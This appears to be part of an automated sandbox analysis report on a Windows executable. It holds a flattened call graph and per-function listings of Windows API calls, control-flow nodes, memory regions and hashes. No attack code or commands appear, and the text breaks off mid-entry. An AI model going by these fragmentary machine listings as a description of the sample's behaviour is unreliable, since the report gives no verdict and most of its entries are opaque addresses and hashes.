630566a 60791->60792 60792->60788 60793 632a1b8 60794 632a1fe GetCurrentProcess 60793->60794 60796 632a250 GetCurrentThread 60794->60796 60799 632a249 60794->60799 60797 632a286 60796->60797 60798 632a28d GetCurrentProcess 60796->60798 60797->60798 60802 632a2c3 60798->60802 60799->60796 60800 632a2eb GetCurrentThreadId 60801 632a31c 60800->60801 60802->60800 62038 425f39 62039 425f45 ___scrt_is_nonwritable_in_current_image 62038->62039 62068 4257c5 62039->62068 62041 425f4c 62042 42609f 62041->62042 62049 425f76 62041->62049 62102 426602 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter IsInExceptionSpec 62042->62102 62044 4260a6 62103 42ed52 169 API calls IsInExceptionSpec 62044->62103 62046 425fb5 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 62055 426016 62046->62055 62098 42ded1 183 API calls 4 library calls 62046->62098 62047 4260ac 62104 42ed16 169 API calls IsInExceptionSpec 62047->62104 62049->62046 62051 425f95 62049->62051 62079 42f813 62049->62079 62050 4260b4 62105 426892 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 62050->62105 62054 4260ba __scrt_common_main_seh 62083 42671d 62055->62083 62057 42601c 62087 3fa810 62057->62087 62062 426038 62062->62044 62063 42603c 62062->62063 62064 426045 62063->62064 62100 42ed07 169 API calls IsInExceptionSpec 62063->62100 62101 425936 219 API calls ___scrt_uninitialize_crt 62064->62101 62067 42604d 62067->62051 62069 4257ce 62068->62069 62106 42622c IsProcessorFeaturePresent 62069->62106 62071 4257da 62107 427b0a 10 API calls 2 library calls 62071->62107 62073 4257df 62074 4257e3 62073->62074 62108 42f704 62073->62108 62074->62041 62077 4257fa 62077->62041 62080 42f821 62079->62080 62081 42f83a 62079->62081 62080->62081 62157 4041d0 IsProcessorFeaturePresent 62080->62157 62081->62046 62084 4279a0 IsInExceptionSpec 62083->62084 62085 426730 GetStartupInfoW 62084->62085 62086 426743 62085->62086 62086->62057 62226 4230c0 GetModuleHandleW 62087->62226 62089 3fa86a 62094 42571f 185 API calls 62089->62094 62090 3fa839 62090->62089 62091 3fa852 62090->62091 62092 3ee7b0 239 API calls 62090->62092 62091->62089 62093 3ee7b0 239 API calls 62091->62093 62092->62091 62093->62089 62095 3fa874 62094->62095 62096 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 62095->62096 62097 3fa91b 62096->62097 62099 426753 GetModuleHandleW 62097->62099 62098->62055 62099->62062 62100->62064 62101->62067 62102->62044 62103->62047 62104->62050 62105->62054 62106->62071 62107->62073 62112 433c65 62108->62112 62111 427b29 7 API calls 2 library calls 62111->62074 62113 433c75 62112->62113 62114 4257ec 62112->62114 62113->62114 62116 4312ce 62113->62116 62114->62077 62114->62111 62117 4312da ___scrt_is_nonwritable_in_current_image 62116->62117 62128 42e881 RtlEnterCriticalSection 62117->62128 62119 4312e1 62129 433dae 62119->62129 62124 4312fa 62143 43121e GetStdHandle GetFileType 62124->62143 62125 431310 62125->62113 62127 4312ff 62144 431325 RtlLeaveCriticalSection IsInExceptionSpec 62127->62144 62128->62119 62130 433dba ___scrt_is_nonwritable_in_current_image 62129->62130 62131 433dc3 62130->62131 62132 433de4 62130->62132 62153 42da48 14 API calls __dosmaperr 62131->62153 62145 42e881 RtlEnterCriticalSection 62132->62145 62135 433dc8 62154 42919f 183 API calls ___std_exception_copy 62135->62154 62137 4312f0 62137->62127 62142 431168 186 API calls 62137->62142 62138 433e1c 62155 433e43 RtlLeaveCriticalSection IsInExceptionSpec 62138->62155 62139 433df0 62139->62138 62146 433cfe 62139->62146 62142->62124 62143->62127 62144->62125 62145->62139 62147 431398 __dosmaperr 14 API calls 62146->62147 62149 433d10 62147->62149 62148 433d1d 62150 430201 ___free_lconv_mon 14 API calls 62148->62150 62149->62148 62156 4316f6 6 API calls __dosmaperr 62149->62156 62152 433d72 62150->62152 62152->62139 62153->62135 62154->62137 62155->62137 62156->62149 62158 40421d 62157->62158 62179 404440 62158->62179 62161 404440 VirtualQuery 62162 4042e4 62161->62162 62182 408840 GetModuleHandleW 62162->62182 62164 4042e9 62165 404440 VirtualQuery 62164->62165 62166 4042ee 62165->62166 62187 402690 GetNativeSystemInfo GetLargePageMinimum GetModuleHandleW 62166->62187 62169 40433c 62170 404440 VirtualQuery 62169->62170 62171 404341 62170->62171 62203 4070b0 GetCurrentProcess IsWow64Process 62171->62203 62172 40433a VirtualProtect 62172->62169 62174 404346 std::_Rethrow_future_exception 62174->62174 62175 404440 VirtualQuery 62174->62175 62176 40440d 62175->62176 62177 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 62176->62177 62178 404424 62177->62178 62178->62080 62180 40422b 62179->62180 62181 40444c VirtualQuery 62179->62181 62180->62161 62181->62180 62183 408855 GetLastError 62182->62183 62184 40885f 62182->62184 62183->62164 62222 408870 29 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 62184->62222 62186 408869 62186->62164 62188 402ac9 62187->62188 62189 402c2f GetLastError 62187->62189 62223 402c60 75 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 62188->62223 62190 402ba4 GetModuleHandleW 62189->62190 62193 402bb7 62190->62193 62194 402c3a GetLastError 62190->62194 62192 402b9e 62192->62190 62224 403b80 21 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 62193->62224 62195 402bee GetModuleHandleW 62194->62195 62198 402c42 GetLastError 62195->62198 62199 402bfd 62195->62199 62197 402beb 62197->62195 62200 402c19 62198->62200 62225 403f10 13 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 62199->62225 62200->62169 62200->62172 62202 402c16 62202->62200 62204 4070f4 GetCurrentProcess IsWow64Process2 62203->62204 62205 40721a GetLastError 62203->62205 62207 40723d GetLastError 62204->62207 62208 407141 CreateFileW 62204->62208 62205->62207 62207->62208 62210 4071d1 62208->62210 62211 4071af GetFinalPathNameByHandleW 62208->62211 62214 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 62210->62214 62212 4071e5 62211->62212 62213 4071c6 62211->62213 62212->62213 62217 4071ec 62212->62217 62213->62210 62215 4071ca CloseHandle 62213->62215 62216 4071de 62214->62216 62215->62210 62216->62174 62218 407206 62217->62218 62219 4071ff CloseHandle 62217->62219 62220 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 62218->62220 62219->62218 62221 407213 62220->62221 62221->62174 62222->62186 62223->62192 62224->62197 62225->62202 62227 4230d0 GetProcAddress 62226->62227 62228 4230f9 62226->62228 62227->62228 62229 4230e2 62227->62229 62228->62090 62229->62090 62230 3f0140 62231 3f0193 62230->62231 62232 3f0310 62230->62232 62234 3f02ca 62231->62234 62235 3f0199 62231->62235 62233 3f028f NtdllDefWindowProc_W 62232->62233 62236 3f032d 62232->62236 62237 3f05ed 62232->62237 62238 3f066a 62232->62238 62239 3f03d9 62232->62239 62240 3f04d7 62232->62240 62241 3f0562 62232->62241 62242 3f0422 62232->62242 62327 3f01ea __Mtx_unlock _Ref_count_obj 62232->62327 62233->62327 62328 4247d2 13 API calls 62234->62328 62243 3f027d 62235->62243 62244 3f01a5 62235->62244 62329 4247d2 13 API calls 62236->62329 62335 4247d2 13 API calls 62237->62335 62336 4247d2 13 API calls 62238->62336 62330 4247d2 13 API calls 62239->62330 62333 4247d2 13 API calls 62240->62333 62334 4247d2 13 API calls 62241->62334 62331 4247d2 13 API calls 62242->62331 62251 3f02bb GetClientRect 62243->62251 62252 3f0286 62243->62252 62253 3f01ab 62244->62253 62254 3f0235 NtdllDefWindowProc_W 62244->62254 62247 3f02d4 62260 3f02df IsWindow 62247->62260 62261 3f070b 62247->62261 62251->62327 62252->62233 62252->62327 62264 3f01b2 62253->62264 62265 3f01f1 62253->62265 62267 3f024d GetClientRect 62254->62267 62254->62327 62256 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 62269 3f02b2 62256->62269 62259 3f04e1 62274 3f04ec 62259->62274 62275 3f0728 62259->62275 62276 3f02f3 BringWindowToTop 62260->62276 62260->62327 62337 424c11 188 API calls IsInExceptionSpec 62261->62337 62262 3f0430 62277 3f071d 62262->62277 62278 3f043b 62262->62278 62263 3f0337 62279 3f0342 SetWindowTextW 62263->62279 62280 3f0711 62263->62280 62264->62233 62281 3f01bb 62264->62281 62285 3f01fa IsWindow 62265->62285 62286 3f0229 PostQuitMessage 62265->62286 62266 3f056c 62283 3f072e 62266->62283 62284 3f0577 62266->62284 62267->62327 62268 3f05f7 62287 3f0734 62268->62287 62288 3f0602 62268->62288 62270 3f0674 62289 3f067f 62270->62289 62290 3f073a 62270->62290 62271 3f03e3 62272 3f03ee IsWindow 62271->62272 62273 3f0717 62271->62273 62293 3f0402 SetForegroundWindow 62272->62293 62272->62327 62339 424c11 188 API calls IsInExceptionSpec 62273->62339 62294 3f04f9 IsWindow 62274->62294 62274->62327 62341 424c11 188 API calls IsInExceptionSpec 62275->62341 62276->62327 62340 424c11 188 API calls IsInExceptionSpec 62277->62340 62295 3f5630 185 API calls 62278->62295 62311 3f035d 62279->62311 62326 3f0372 62279->62326 62338 424c11 188 API calls IsInExceptionSpec 62280->62338 62297 3f01c7 GetClientRect 62281->62297 62281->62327 62342 424c11 188 API calls IsInExceptionSpec 62283->62342 62298 3f0584 IsWindow 62284->62298 62284->62327 62285->62286 62301 3f0205 ShowWindow DestroyWindow 62285->62301 62286->62327 62343 424c11 188 API calls IsInExceptionSpec 62287->62343 62305 3f060f GetWindowRect 62288->62305 62288->62327 62291 3f06df 62289->62291 62292 3f0688 GetWindowRect 62289->62292 62344 424c11 188 API calls IsInExceptionSpec 62290->62344 62321 3ee7b0 239 API calls 62291->62321 62291->62327 62308 3f06ad MoveWindow Sleep 62292->62308 62293->62327 62309 3f0508 ShowWindow 62294->62309 62294->62327 62310 3f0449 62295->62310 62297->62327 62312 3f0593 ShowWindow 62298->62312 62298->62327 62301->62286 62314 3f0634 MoveWindow Sleep 62305->62314 62315 3f06d7 62308->62315 62308->62327 62316 3f051b UpdateWindow 62309->62316 62324 3f0530 62309->62324 62332 3fa970 240 API calls 3 library calls 62310->62332 62323 3ee7b0 239 API calls 62311->62323 62311->62326 62318 3f05a6 UpdateWindow 62312->62318 62312->62324 62313 3f0723 62319 4291af 183 API calls 62313->62319 62320 3f0662 62314->62320 62314->62327 62315->62308 62316->62324 62316->62327 62318->62324 62318->62327 62319->62275 62320->62314 62321->62327 62322 3f044e 62325 3ee7b0 239 API calls 62322->62325 62322->62326 62323->62326 62324->62291 62324->62327 62325->62326 62326->62313 62326->62327 62327->62256 62328->62247 62329->62263 62330->62271 62331->62262 62332->62322 62333->62259 62334->62266 62335->62268 62336->62270

                                Executed Functions

                                Function 003F0140 Relevance: 46.9, APIs: 31, Instructions: 442nativewindowCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 72 3f0140-3f018d 73 3f0193 72->73 74 3f0310-3f0319 72->74 77 3f02ca-3f02d9 call 4247d2 73->77 78 3f0199-3f019f 73->78 75 3f028f-3f0295 NtdllDefWindowProc_W 74->75 76 3f031f-3f0326 74->76 89 3f029b-3f02b8 call 425711 75->89 76->75 79 3f032d-3f033c call 4247d2 76->79 80 3f05ed-3f05fc call 4247d2 76->80 81 3f066a-3f0679 call 4247d2 76->81 82 3f03d9-3f03e8 call 4247d2 76->82 83 3f04d7-3f04e6 call 4247d2 76->83 84 3f0704-3f0706 76->84 85 3f0562-3f0571 call 4247d2 76->85 86 3f0422-3f0435 call 4247d2 76->86 105 3f02df-3f02ed IsWindow 77->105 106 3f070b-3f070c call 424c11 77->106 87 3f027d-3f0284 78->87 88 3f01a5 78->88 125 3f0342-3f0348 79->125 126 3f0711-3f0712 call 424c11 79->126 135 3f0734-3f0735 call 424c11 80->135 136 3f0602-3f0609 80->136 137 3f067f-3f0686 81->137 138 3f073a-3f073b call 424c11 81->138 117 3f03ee-3f03fc IsWindow 82->117 118 3f0717-3f0718 call 424c11 82->118 119 3f04ec-3f04f3 83->119 120 3f0728-3f0729 call 424c11 83->120 84->89 129 3f072e-3f072f call 424c11 85->129 130 3f0577-3f057e 85->130 123 3f071d-3f071e call 424c11 86->123 124 3f043b-3f0453 call 3f5630 call 3fa970 86->124 96 3f02bb-3f02c8 GetClientRect 87->96 97 3f0286-3f0289 87->97 98 3f01ab-3f01b0 88->98 99 3f0235-3f024b NtdllDefWindowProc_W 88->99 96->89 97->75 97->84 109 3f01b2-3f01b5 98->109 110 3f01f1-3f01f8 98->110 99->89 112 3f024d-3f026f GetClientRect 99->112 121 3f06f7-3f0701 call 4247f7 105->121 122 3f02f3-3f030e BringWindowToTop call 4247f7 105->122 106->126 109->75 127 3f01bb-3f01c1 109->127 131 3f01fa-3f0203 IsWindow 110->131 132 3f0229-3f0233 PostQuitMessage 110->132 133 3f0278-3f027b 112->133 134 3f0271-3f0276 112->134 117->121 141 3f0402-3f041d SetForegroundWindow call 4247f7 117->141 118->123 119->121 142 3f04f9-3f0502 IsWindow 119->142 120->129 121->84 122->89 169 3f0723 call 4291af 123->169 197 3f0455-3f045c 124->197 198 3f0470-3f0472 124->198 146 3f034c-3f035b SetWindowTextW 125->146 147 3f034a 125->147 126->118 127->84 148 3f01c7-3f01ec GetClientRect 127->148 129->135 130->121 149 3f0584-3f058d IsWindow 130->149 131->132 152 3f0205-3f0223 ShowWindow DestroyWindow 131->152 132->89 133->89 134->89 135->138 136->121 156 3f060f-3f0632 GetWindowRect 136->156 139 3f06df-3f06e6 137->139 140 3f0688-3f06aa GetWindowRect 137->140 139->121 161 3f06e8-3f06ea 139->161 159 3f06ad-3f06d5 MoveWindow Sleep 140->159 141->89 142->121 162 3f0508-3f0519 ShowWindow 142->162 166 3f035d-3f0364 146->166 167 3f0375-3f037b 146->167 147->146 148->89 149->121 168 3f0593-3f05a4 ShowWindow 149->168 152->132 170 3f0634-3f065c MoveWindow Sleep 156->170 159->121 171 3f06d7-3f06dd 159->171 173 3f06ef-3f06f4 call 3ee7b0 161->173 174 3f051b-3f052a UpdateWindow 162->174 175 3f0549-3f0550 162->175 166->167 177 3f0366-3f0372 call 3ee7b0 166->177 181 3f03ae-3f03d4 call 4259a5 call 4247f7 167->181 182 3f037d-3f038c 167->182 179 3f05a6-3f05b5 UpdateWindow 168->179 180 3f05d4-3f05db 168->180 169->120 170->121 184 3f0662-3f0668 170->184 171->159 173->121 174->121 186 3f0530-3f0537 174->186 175->121 187 3f0556-3f055d 175->187 177->167 179->121 190 3f05bb-3f05c2 179->190 180->121 193 3f05e1-3f05e8 180->193 181->89 191 3f038e-3f039c 182->191 192 3f03a4-3f03ab call 4259a5 182->192 184->170 186->121 196 3f053d-3f0544 186->196 187->173 190->121 200 3f05c8-3f05cf 190->200 191->169 201 3f03a2 191->201 192->181 193->173 196->173 204 3f045e-3f046a call 3ee7b0 197->204 205 3f046d 197->205 206 3f04c7-3f04d2 call 4247f7 198->206 207 3f0474-3f047a 198->207 200->173 201->192 204->205 205->198 206->89 211 3f04ad-3f04c4 call 4259a5 207->211 212 3f047c-3f048b 207->212 211->206 216 3f048d-3f049b 212->216 217 3f04a3-3f04aa call 4259a5 212->217 216->169 220 3f04a1 216->220 217->211 220->217
                                APIs
                                • GetClientRect.USER32(?,?), ref: 003F01CC
                                • IsWindow.USER32(000701F0), ref: 003F01FB
                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,0043B4CD,000000FF), ref: 003F020D
                                • DestroyWindow.USER32(000701F0,?,?,?,?,?,?,?,?,?,?,?,0043B4CD,000000FF), ref: 003F0223
                                • PostQuitMessage.USER32(00000000), ref: 003F022B
                                • NtdllDefWindowProc_W.NTDLL(?,00000084,?,000000FF,A05DD77D), ref: 003F023F
                                • GetClientRect.USER32(?,?), ref: 003F0252
                                • NtdllDefWindowProc_W.NTDLL(?,?,?,000000FF,A05DD77D), ref: 003F0295
                                • GetClientRect.USER32(?,?), ref: 003F02C0
                                • IsWindow.USER32 ref: 003F02E5
                                • BringWindowToTop.USER32 ref: 003F02F9
                                • __Mtx_unlock.LIBCPMT ref: 003F0304
                                • SetWindowTextW.USER32(000000FF), ref: 003F0353
                                • __Mtx_unlock.LIBCPMT ref: 003F03CA
                                • IsWindow.USER32 ref: 003F03F4
                                • SetForegroundWindow.USER32 ref: 003F0408
                                • __Mtx_unlock.LIBCPMT ref: 003F0413
                                • __Mtx_unlock.LIBCPMT ref: 003F04C8
                                • IsWindow.USER32(000701F0), ref: 003F04FA
                                • ShowWindow.USER32(00000006,?,?,?,?,?,?,?,?,?,?,?,?,?,0043B4CD), ref: 003F0510
                                • UpdateWindow.USER32 ref: 003F0521
                                • IsWindow.USER32(000701F0), ref: 003F0585
                                • ShowWindow.USER32(00000009,?,?,?,?,?,?,?,?,?,?,?,?,?,0043B4CD), ref: 003F059B
                                • UpdateWindow.USER32 ref: 003F05AC
                                • __Mtx_unlock.LIBCPMT ref: 003F06FC
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Window$Mtx_unlock$ClientRectShow$NtdllProc_Update$BringDestroyForegroundMessagePostQuitText
                                • String ID:
                                • API String ID: 4037737374-0
                                • Opcode ID: b45d2054eea2168f667cd67b0ed08ba4388e1e1dea0faddbc84568d19ec4e164
                                • Instruction ID: e99d5c86284d2033ef05c40c9caacdca6893b5f0676ebbcac790da8b543b561a
                                • Opcode Fuzzy Hash: b45d2054eea2168f667cd67b0ed08ba4388e1e1dea0faddbc84568d19ec4e164
                                • Instruction Fuzzy Hash: 9AE12775A00208EBDB1AAF68ED4DB7E3768FB45304F114535F601E6192EBB59C20CB7A
                                Function 003FF4F0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 234filenativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 931 3ff4f0-3ff54d GetCurrentProcess 932 3ff54f-3ff557 GetModuleHandleW 931->932 933 3ff55a-3ff5a3 call 3ff3f0 931->933 932->933 938 3ff619-3ff626 933->938 939 3ff5a5-3ff5aa 933->939 940 3ff629-3ff62c 938->940 941 3ff5ac-3ff5b1 939->941 942 3ff5b7-3ff5cd call 3ffcb0 939->942 944 3ff62f-3ff639 940->944 941->942 945 3ff781-3ff79b 941->945 949 3ff5cf-3ff617 call 3ff3f0 942->949 950 3ff641-3ff65d 942->950 947 3ff63f-3ff6e0 NtCreateFile 944->947 948 3ff75e-3ff77f call 3fa3b0 944->948 945->940 958 3ff6e6-3ff705 call 405de0 947->958 959 3ff7a0-3ff7de call 3fa3b0 947->959 956 3ff736-3ff75d call 3f4420 call 425711 948->956 949->938 949->939 950->944 965 3ff70a-3ff711 958->965 970 3ff72e-3ff731 call 3fb060 959->970 968 3ff717-3ff723 965->968 969 3ff7e3-3ff804 call 3fa3b0 965->969 973 3ff726-3ff729 call 3f4420 968->973 969->973 970->956 973->970
                                APIs
                                • GetCurrentProcess.KERNEL32(A05DD77D,00000000,?), ref: 003FF540
                                • GetModuleHandleW.KERNEL32(00000000), ref: 003FF551
                                • NtCreateFile.NTDLL ref: 003FF6CE
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CreateCurrentFileHandleModuleProcess
                                • String ID: `F$`F
                                • API String ID: 1303309024-2864732840
                                • Opcode ID: 256282baa7a855bbe776f1ec4a39bb9562cf49c93427d49c17792caf6df1670b
                                • Instruction ID: f32b3d68b50dc6f3dd28dcb64ef6c9c98290b2723bf1be2deb32fdd557530ef3
                                • Opcode Fuzzy Hash: 256282baa7a855bbe776f1ec4a39bb9562cf49c93427d49c17792caf6df1670b
                                • Instruction Fuzzy Hash: 82A147B5D0020C9FDB11CFA4C985BEEBBF5AF09314F24812AE915AB390DB746948CF95
                                Function 06321DD8 Relevance: 2.3, Strings: 1, Instructions: 1083COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849710870.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6320000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4
                                • API String ID: 0-4088798008
                                • Opcode ID: 153efcc03a3b06e051accb17469f40628ed248748e647a8de94472a7a7f2d82e
                                • Instruction ID: 20df94e2eb4b55bc73b13d045ee95b5d3ae378f5f4db850c95ec14aac4bd6036
                                • Opcode Fuzzy Hash: 153efcc03a3b06e051accb17469f40628ed248748e647a8de94472a7a7f2d82e
                                • Instruction Fuzzy Hash: B5A2EA34A00219DFDB54CF98D994BADB7B6FB88700F158099E909AB355CB31EE46CF90
                                Function 06307D78 Relevance: 1.9, APIs: 1, Instructions: 396COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: DispatchMessage
                                • String ID:
                                • API String ID: 2061451462-0
                                • Opcode ID: 73f7d3991be512e6bbf92eca55bb1b35af76935ed473597548bbfae615f22e9d
                                • Instruction ID: d35470a5d547eb0e4bf89ff1d425e66fe1a77119b5b1cbc6cf40cef9b7a99ccf
                                • Opcode Fuzzy Hash: 73f7d3991be512e6bbf92eca55bb1b35af76935ed473597548bbfae615f22e9d
                                • Instruction Fuzzy Hash: 7BF17B30E00609CFEF54DFA9C858BADBBF5BF88314F158558E405AB2A5DB74E949CB80
                                Function 06302E91 Relevance: 1.7, APIs: 1, Instructions: 164COMMON
                                Download Yara Rule
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06303042
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: f173772fa5465cfd57e506742a1a2a019452b6a48d01cc2e5594fa7e4c3229d4
                                • Instruction ID: 3fbf761878604a27aed786f223ce4894bf1f5c7f74d4699280c84dde7afcf076
                                • Opcode Fuzzy Hash: f173772fa5465cfd57e506742a1a2a019452b6a48d01cc2e5594fa7e4c3229d4
                                • Instruction Fuzzy Hash: 0A6113B1C04249AFEF11CF99C884ACEBFB5FF48300F15816AE918AB261D771A955CF90
                                Function 063026D0 Relevance: .3, Instructions: 289COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 63b713b608cbc176d227dff2a3974ec02e87b6857e871a9e667890b10a75b210
                                • Instruction ID: 93722a656ec2c2ee27564a9d9675c15c321be6e7ffd15986660f3e3f935899f8
                                • Opcode Fuzzy Hash: 63b713b608cbc176d227dff2a3974ec02e87b6857e871a9e667890b10a75b210
                                • Instruction Fuzzy Hash: F9B1FE70A007058FDB88EF79C894A6EBBF5FF88310B008529C45ADB380DB74E949CB94
                                Function 06300314 Relevance: .3, Instructions: 253COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5d995c196f4d72e77b0d6e36b5ab74a63a88288fe928809e63e08b65475246c5
                                • Instruction ID: c18b9b7f2e093878b5d88b9971e09ba63126bb5b344567e82983da20bdd92077
                                • Opcode Fuzzy Hash: 5d995c196f4d72e77b0d6e36b5ab74a63a88288fe928809e63e08b65475246c5
                                • Instruction Fuzzy Hash: D9A18235E1031A9FEB04DFA4D8949DDFBBAFF89310F158615E415AB2A0DB30E949CB90
                                Function 06303211 Relevance: .2, Instructions: 227COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bbbf604a8101d54d731daab6285ece24edff54044f7e286842c4f2c6e70478ab
                                • Instruction ID: 3bc47398cdd7423b976ec552e60a3bfdaef23b532844659af6d29ffa4ca4e27c
                                • Opcode Fuzzy Hash: bbbf604a8101d54d731daab6285ece24edff54044f7e286842c4f2c6e70478ab
                                • Instruction Fuzzy Hash: C691C435E1031A9FDB05DFA4D8549DDFBBBFF8A310F158215E415AB2A0DB30A949CBA0
                                Function 025B4EC9 Relevance: .1, Instructions: 134COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3846304760.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_25b0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6d94f838d753422481ae37bd4871bbe53b820d5ff3e1dec86ebaa305a3bfebe8
                                • Instruction ID: 7d7433680ecfda654dc653ec0f20b8780a38598607d5d6d81108f2dd96eaff31
                                • Opcode Fuzzy Hash: 6d94f838d753422481ae37bd4871bbe53b820d5ff3e1dec86ebaa305a3bfebe8
                                • Instruction Fuzzy Hash: B061BE74B01246CBE745CF3DF848706BBA2F7C4314F449AA5D4045B316EBB85C2ADB9A
                                Function 025B4ED8 Relevance: .1, Instructions: 131COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3846304760.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_25b0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e02574e695b54a7aa9428223a2dbbdf1ffa5eb1b16dad72044cd20ca5977a2ad
                                • Instruction ID: 21f3890b2d81e78ef4191407153f012ed2b9ead09f57ad0ea8719f2f16ed9a69
                                • Opcode Fuzzy Hash: e02574e695b54a7aa9428223a2dbbdf1ffa5eb1b16dad72044cd20ca5977a2ad
